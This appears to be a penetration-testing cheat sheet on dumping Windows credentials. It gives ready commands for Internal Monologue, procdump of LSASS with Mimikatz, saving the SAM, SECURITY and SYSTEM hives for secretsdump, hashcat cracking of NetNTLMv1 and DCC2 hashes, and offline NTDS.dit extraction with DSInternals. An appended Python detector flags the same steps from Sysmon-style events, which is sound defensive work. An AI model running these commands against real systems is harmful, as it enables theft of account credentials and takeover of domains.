Alternate Cred Dumps

Internal Monologue

Internal Monologue is a way of dumping credentials without touching LSASS: it returns NetNTLMv1 challenge-response hashes for the logged-on users, which is why the hashcat mode below is 5500 (NetNTLMv1) rather than an NT-hash mode.

Using Internal Monologue

execute-assembly /root/ADShare/NET4.6.2/InternalMonologue.exe [help]

Cracking Returned Hashes

# -m 5500 = NetNTLMv1 (the format Internal Monologue returns)
hashcat hashes.txt /usr/share/wordlists/rockyou.txt -m 5500 --force

Procdump + Mimikatz

# Dump LSASS with the Sysinternals (Microsoft-signed) binary; -ma writes a full memory dump
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

# Move lsass.dmp offline and use mimikatz to open the minidump and dump passwords
mimikatz # sekurlsa::minidump /root/lsass.dmp
mimikatz # sekurlsa::logonpasswords

# Viewing the dump with Invoke-Mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\lsass.dmp" "sekurlsa::logonpasswords"'

Reg SAM / Security / System

# Export the three hives (SYSTEM holds the boot key needed to decrypt the other two)
reg save hklm\system system
reg save hklm\security security
reg save hklm\sam sam

# Extract offline with Impacket's secretsdump
python secretsdump.py -security security -system system -sam sam LOCAL

# Cracking the MS-Cache v2 (DCC2) hashes recovered from the SECURITY hive
Put each hash in this format:
$DCC2$10240#username#hash

Crack (-m 2100 = Domain Cached Credentials 2 / MS-Cache v2):
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable

Offline DCSync

# For this you need the NTDS.dit file and the SYSTEM registry hive
# You will also need the DSInternals PowerShell module. Both can be moved across machines.

# Import DSInternals
import-module C:\Users\Administrator\Documents\DS\DSInternals\4.3\DSInternals.psd1

# Grab the boot key from the SYSTEM hive. This can be done offline or against a mounted DC VM disk.
$key = Get-BootKey -SystemHivePath D:\Windows\System32\config\SYSTEM

# Extract user information from NTDS.dit
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key

# Extract NT hashes from NTDS.dit in hashcat format, i.e. the same output a DCSync would give
Get-ADDBAccount -All -DBPath 'D:\Windows\System32\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File vault-hashes.txt -Encoding ASCII

# The file can then be cracked or used exactly as normal DCSync output would be.
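Each of the four techniques on this page leaves a distinct host-side trace, and the following Python detector (an added example, not part of the original cheat sheet) flags all of them from one event stream: Internal Monologue rewriting the LSA NTLM settings (LmCompatibilityLevel and related values) to force a NetNTLMv1 response, procdump opening lsass.exe with memory-read rights and writing the minidump, `reg save` of the SAM/SECURITY/SYSTEM hives, and a copy of ntds.dit appearing outside the NTDS folder. The events are constructed inline using Sysmon's field names (EventID, Image, TargetImage, GrantedAccess, TargetFilename, CommandLine, TargetObject, Details); the allow-list of benign lsass readers and the sample paths are assumptions to tune per estate, and the offline DSInternals step itself leaves no trace on the victim, so only the ntds.dit exfiltration is caught.

```python
"""Host-side detection for the credential-dumping techniques on this page.

Added example: not part of the original cheat sheet. The events below are
constructed in Sysmon's field vocabulary (EventID, Image, TargetImage,
GrantedAccess, TargetFilename, CommandLine, TargetObject, Details); the
allow-list and file paths are assumptions to tune per estate.
"""
import re

PROCESS_VM_READ = 0x0010                 # right MiniDumpWriteDump needs on lsass
LSASS_READ_ALLOWLIST = {"msmpeng.exe"}   # assumed benign lsass readers; tune it
# reg save of the three hives the page exports (Event 1 command line)
HIVE_SAVE = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.I)
# Internal Monologue rewrites these LSA values to force a NetNTLMv1 response
NTLM_DOWNGRADE_VALUES = {"lmcompatibilitylevel", "ntlmminclientsec",
                         "restrictsendingntlmtraffic"}


def check_event(ev):
    """Return a one-line finding for a suspicious event, or None."""
    eid = ev.get("EventID")
    src = ev.get("Image", "").rsplit("\\", 1)[-1].lower()

    # Procdump/Mimikatz: another process opens lsass with memory-read rights
    if eid == 10 and ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
        if granted & PROCESS_VM_READ and src not in LSASS_READ_ALLOWLIST:
            return f"lsass memory opened by {src} (GrantedAccess={ev['GrantedAccess']})"

    if eid == 11:
        path = ev.get("TargetFilename", "")
        low = path.lower()
        # the minidump itself (operators rename it, so match loosely)
        if "lsass" in low and low.endswith(".dmp"):
            return f"LSASS minidump written: {path}"
        # ntds.dit anywhere but the DSA's own folder (default %SystemRoot%\NTDS)
        if low.endswith("\\ntds.dit") and "\\windows\\ntds\\" not in low:
            return f"ntds.dit copy outside the NTDS folder: {path}"

    if eid == 1:
        m = HIVE_SAVE.search(ev.get("CommandLine", ""))
        if m:
            return f"registry hive export via reg save: {m.group(1).upper()}"

    if eid == 13:
        value = ev.get("TargetObject", "").rsplit("\\", 1)[-1].lower()
        if value in NTLM_DOWNGRADE_VALUES:
            return f"NTLM downgrade by {src}: {value} = {ev.get('Details')}"

    return None


def scan(events):
    """Run check_event over a list of events and keep the hits."""
    return [hit for hit in map(check_event, events) if hit]


# Constructed sample events: the four techniques above plus two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": "C:\\Temp\\InternalMonologue.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel",
     "Details": "DWORD (0x00000002)"},
    {"EventID": 10, "Image": "C:\\Temp\\procdump64.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 11, "Image": "C:\\Temp\\procdump64.exe",
     "TargetFilename": "C:\\Temp\\lsass.dmp"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save hklm\\sam sam"},
    {"EventID": 11, "Image": "C:\\Windows\\System32\\cmd.exe",
     "TargetFilename": "C:\\Temp\\ntds.dit"},
    # benign: Defender's engine is on the allow-list, and reg query is not reg save
    {"EventID": 10, "Image": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\MsMpEng.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg query hklm\\software\\microsoft\\windows"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The lsass check keys on the PROCESS_VM_READ bit rather than an exact GrantedAccess mask, because procdump, Mimikatz and other dumpers request different masks but all need to read process memory; the cost is that every legitimate reader (AV engines, EDR sensors) has to be allow-listed explicitly.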

Last updated 4 years ago
